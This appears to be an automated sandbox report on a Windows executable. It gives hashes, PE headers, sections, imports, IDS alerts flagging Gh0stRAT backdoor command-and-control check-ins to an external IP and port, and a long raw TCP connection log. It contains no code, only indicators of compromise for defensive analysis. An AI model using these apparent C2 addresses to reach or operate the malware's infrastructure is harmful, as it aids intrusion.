                                                                                      SHA512:7a8f9c8d1330d9746fa26b0bc194a500d3f73df032a829677d667001955fccfc8c7fdaafaf0fcfa06e5edf858d6b86c2399000a4a4b073419c214c2072ea1911
                                                                                      SSDEEP:3072:EoUOpGkDuFdnFYGKLOiLS2iOJJC2jLEfTRoalXzeQGxGVriCW5to3GYVfJ0TFE+/:WT+viOW2nEfTll85twYhE+9hs0
                                                                                      TLSH:A6677B6AB6D050F5D1768174C841A62AF3B27C39072457FF43A4322ADE736E89E3EB50
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........m...>...>...>...?...>...?...>...?...>...?...>...?...>...?...>...?...>...>...>)..?...>).W>...>)..?...>Rich...>........PE..d..
                                                                                      Icon Hash:30f0f0b2b2d2f090
                                                                                      Entrypoint:0x14000751c
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66A6DF58 [Mon Jul 29 00:16:24 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:d343b90a31fdc2e0ba6252eeff1d2666
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26410 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d84000 | 0x7c88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d82000 | 0x18cc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d8c000 | 0x660 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x24500 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1c7e0 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1c000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2629c | 0x60 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1a630 | 0x1a800 | 2e34758538c2804b33adfc8bdef89d52 | False | 0.5443230395047169 | data | 6.396906534965292 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1c000 | 0xac76 | 0xae00 | 7f15e0a0be73072783d6e311a28e0740 | False | 0.45492097701149425 | data | 5.001537065779476 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x27000 | 0x1d5adf8 | 0x1d58400 | 8bedae8ed9f42ddfe652e147e18c8d44 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d82000 | 0x18cc | 0x1a00 | 596427158a7635a578c19c41448bf7d7 | False | 0.46334134615384615 | data | 5.01289537127354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1d84000 | 0x7c88 | 0x7e00 | 2f3c26b362d5444f973ed4fe3856769d | False | 0.5987103174603174 | data | 6.192545820714944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d8c000 | 0x660 | 0x800 | e7724406b746c340abe120cf92277860 | False | 0.55712890625 | data | 4.9097899511193095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1d84130 | 0x3f1b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9801918910554008
RT_ICON | 0x1d88050 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.1739218877135883
RT_ICON | 0x1d8a6b8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.2506830601092896
RT_ICON | 0x1d8b7e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4326241134751773
RT_GROUP_ICON | 0x1d8bc48 | 0x3e | data | English | United States | 0.8064516129032258
DLL | Import
KERNEL32.dll | SetCurrentDirectoryA, GetFileAttributesA, GetModuleFileNameA, SetDllDirectoryA, RaiseException, GetLastError, GetSystemInfo, VirtualProtect, VirtualQuery, FreeLibrary, GetModuleHandleW, GetProcAddress, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, WriteConsoleW, RtlUnwindEx, RtlPcToFileHeader, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetFileType, MultiByteToWideChar, WideCharToMultiByte, SetEnvironmentVariableW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleCP, GetConsoleMode, GetFileSizeEx, VirtualAlloc, HeapSize, HeapReAlloc, CloseHandle, CreateFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T01:54:52.568223+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.4 | 50017 | 47.243.243.58 | 8917 | TCP
2025-01-09T01:54:54.716580+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.4 | 50018 | 47.243.243.58 | 8917 | TCP
2025-01-09T01:54:56.812545+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.4 | 50019 | 47.243.243.58 | 8917 | TCP
2025-01-09T01:54:59.807839+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.4 | 50020 | 47.243.243.58 | 8917 | TCP
2025-01-09T01:55:02.654024+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.4 | 50021 | 47.243.243.58 | 8917 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Jan 9, 2025 01:52:53.638856888 CET4434973659.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:53.845987082 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:53.846033096 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:53.846096039 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:53.846344948 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:53.846357107 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.061810970 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.061872959 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.066879988 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.066885948 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.067059994 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.067064047 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.393558979 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.393579960 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.393726110 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.393726110 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.393739939 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.393783092 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.393790007 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.393835068 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.395267010 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.395337105 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.399120092 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.399177074 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.480336905 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.480426073 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.480464935 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.480612040 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.481204987 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.481408119 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.481617928 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.481678009 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.482474089 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.482527018 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.482878923 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.482930899 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.484213114 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.484261036 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.484395027 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.484446049 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.486023903 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.486077070 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.567203045 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.567255974 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.567359924 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.567394972 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.567567110 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.567608118 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.567703009 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.567744017 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.567939997 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.567972898 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.567980051 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.567990065 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568006039 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568011045 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568026066 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568028927 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568049908 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568079948 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568420887 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568489075 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568636894 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568697929 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568717957 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568722963 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.568739891 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.568770885 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.569097996 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.569153070 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.569291115 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.569340944 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.571024895 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.571070910 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.571141005 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.571183920 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.572793007 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.572843075 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.572904110 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.572942972 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654019117 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654073000 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654174089 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654208899 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654381990 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654421091 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654422045 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654429913 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654458046 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654464960 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654501915 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654505014 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654516935 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.654542923 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.654563904 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.669473886 CET49737443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.669492006 CET4434973759.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.692203999 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.692238092 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:55.692312002 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.692543983 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:55.692558050 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:56.929925919 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:56.930102110 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:56.930488110 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:56.930496931 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:56.930702925 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:56.930707932 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.273257017 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.273277998 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.273452044 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.273479939 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.273538113 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.273557901 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.273610115 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.274007082 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.274063110 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.275376081 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.275435925 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.365727901 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.365798950 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.365928888 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.365928888 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.365955114 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.366000891 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.366218090 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.366275072 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.366549015 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.366607904 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.366729021 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.366787910 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.367485046 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.367543936 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.368396044 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.368452072 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.368863106 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.368916988 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.368971109 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.369018078 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.458619118 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.458655119 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.458699942 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.458714008 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.458852053 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.458852053 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.458858967 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.458870888 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.458911896 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459156036 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459184885 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459204912 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459212065 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459230900 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459254980 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459449053 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459486961 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459502935 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459508896 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459532022 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459551096 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459830999 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459867001 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459893942 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459897995 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459907055 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.459918976 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.459954977 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.460360050 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.460390091 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.460414886 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.460422039 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.460437059 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.460469007 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.460598946 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.460650921 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.460679054 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.460732937 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.460969925 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.461026907 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.463495016 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:52:57.463552952 CET49738443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:52:57.550461054 CET4434973859.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.604640007 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.604666948 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.604685068 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.604687929 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.604707956 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.604727983 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689050913 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689126968 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689214945 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689214945 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689227104 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689268112 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689306021 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689332008 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689354897 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689361095 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689383984 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689404011 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689573050 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689609051 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689620972 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689625025 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689640045 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689657927 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689661980 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.689677954 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.689690113 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690198898 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690238953 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690248966 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690253973 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690299988 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690586090 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690632105 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690634012 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690643072 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690674067 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690684080 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690687895 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690707922 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690716028 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690730095 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690732956 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.690753937 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.690785885 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.691240072 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691278934 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691289902 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.691293001 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691308022 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691329956 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.691337109 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.691339970 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691346884 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691363096 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.691375971 CET4434974059.110.190.44192.168.2.4
                                                                                      Jan 9, 2025 01:53:01.691395998 CET49740443192.168.2.459.110.190.44
                                                                                      Jan 9, 2025 01:53:01.691401005 CET4434974059.110.190.44192.168.2.4
